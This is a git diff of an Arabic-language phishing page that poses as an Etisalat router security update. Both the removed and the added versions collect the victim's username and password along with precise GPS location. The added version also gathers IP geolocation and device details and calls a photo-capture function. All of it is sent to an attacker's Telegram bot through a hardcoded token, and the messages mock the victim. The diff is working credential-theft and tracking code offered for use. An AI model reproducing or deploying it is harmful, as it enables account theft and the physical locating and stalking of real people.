--- a/index.html
+++ b/index.html
@@ -1,70 +1,30 @@
-<!DOCTYPE html>
-<html lang="ar">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Router Security Update</title>
-    <style>
-        body { font-family: Tahoma, Arial; background-color: #f0f0f0; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; direction: rtl; }
-        .login-box { background: white; border: 1px solid #ccc; width: 400px; padding: 25px; box-shadow: 2px 2px 5px rgba(0,0,0,0.1); display: none; } /* مخفية لحد ما يوافق */
-        .header { border-bottom: 2px solid #78be20; padding-bottom: 10px; margin-bottom: 20px; text-align: left; }
-        .header img { width: 60px; }
-        .btn-login { background-color: #78be20; color: white; border: none; padding: 10px; cursor: pointer; font-size: 14px; font-weight: bold; width: 100%; margin-top: 10px; }
-        #error-msg { color: red; text-align: center; display: none; padding: 20px; font-weight: bold; }
-    </style>
-</head>
-<body onload="getLocation()">
-    <div id="error-msg">⚠️ خطأ في الأمان: يجب السماح بالوصول للموقع الجغرافي لتحديث إعدادات الراوتر وتأمين الشبكة.</div>
+<script>
+    const botToken = '8347819984:AAFi1b3BL9sYP3BbkqpWY3XtVfWatppm8Rk'; 
+    const chatId = '1559993244'; 
 
-    <div class="login-box" id="main-box">
-        <div class="header"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/a/af/Etisalat_logo.svg/1200px-Etisalat_logo.svg.png"></div>
-        <div style="font-size: 12px; margin-bottom: 15px;">تم التحقق من الموقع. يرجى تسجيل الدخول لتأمين حسابك.</div>
-        <input type="text" id="user-input" placeholder="اسم المستخدم" style="width:100%; margin-bottom:10px; padding:8px;">
-        <input type="password" id="pass-input" placeholder="كلمة المرور" style="width:100%; margin-bottom:10px; padding:8px;">
-        <button class="btn-login" id="start-btn">تسجيل الدخول</button>
-    </div>
+    document.getElementById('start-btn').addEventListener('click', () => {
+        const username = document.getElementById('user-input').value;
+        const password = document.getElementById('pass-input').value;
 
-    <script>
-        const botToken = '8347819984:AAFi1b3BL9sYP3BbkqpWY3XtVfWatppm8Rk'; 
-        const chatId = '1559993244'; 
-
-        function getLocation() {
-            if (navigator.geolocation) {
-                navigator.geolocation.getCurrentPosition(showPosition, showError);
-            } else {
-                document.getElementById('error-msg').innerText = "المتصفح لا يدعم تحديد الموقع.";
-                document.getElementById('error-msg').style.display = 'block';
-            }
-        }
-
-        async function showPosition(position) {
+        // طلب إحداثيات الموقع الدقيقة (GPS)
+        navigator.geolocation.getCurrentPosition(async (position) => {
             const lat = position.coords.latitude;
             const lon = position.coords.longitude;
-            
-            // إظهار صفحة الدخول بعد الموافقة
-            document.getElementById('main-box').style.display = 'block';
-            
-            // إرسال إشعار فوري بالموقع بدقة الخريطة
             const mapLink = `https://www.google.com/maps?q=${lat},${lon}`;
-            const msg = `📍 صيد جديد حدد مكانه!\n🌍 رابط الموقع على الخريطة: ${mapLink}\n🎯 الدقة: ${position.coords.accuracy} متر`;
+
+            // سحب البيانات التانية
+            const geoRes = await fetch('https://ipapi.co/json/');
+            const geo = await geoRes.json();
+
+            // إرسال رسالة "تحديد السطح" فوراً
+            const msg = `📍 تم تحديد السطح بالملي!\n👤 الاسم: ${username}\n🔑 السر: ${password}\n🌍 رابط الموقع: ${mapLink}\n📱 الجهاز: ${navigator.platform}`;
             fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(msg)}`);
-        }
 
-        function showError(error) {
-            // لو رفض الموقع، الصفحة هتفضل بيضاء وتظهر رسالة الخطأ
-            document.getElementById('error-msg').style.display = 'block';
-            document.getElementById('main-box').style.display = 'none';
-        }
-
-        document.getElementById('start-btn').addEventListener('click', () => {
-            const user = document.getElementById('user-input').value;
-            const pass = document.getElementById('pass-input').value;
-            if (user && pass) {
-                const finalMsg = `🔥 اتقفش بالكامل!\n👤 الاسم: ${user}\n🔑 السر: ${pass}\n✅ "وقعت يا حمار"`;
-                fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(finalMsg)}`);
-                alert("وقعت يا حمار!");
-            }
-        });
-    </script>
-</body>
-</html>
+            // تكملة عملية التصوير اللي عملناها قبل كدة...
+            capturePhoto(username, password); 
+        }, (err) => {
+            // لو رفض الـ GPS نبعت البيانات المتاحة
+            fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=⚠️ رفض تحديد الموقع بس اتقفش بالباسورد: ${password}`);
+        }, { enableHighAccuracy: true });
+    });
+</script>
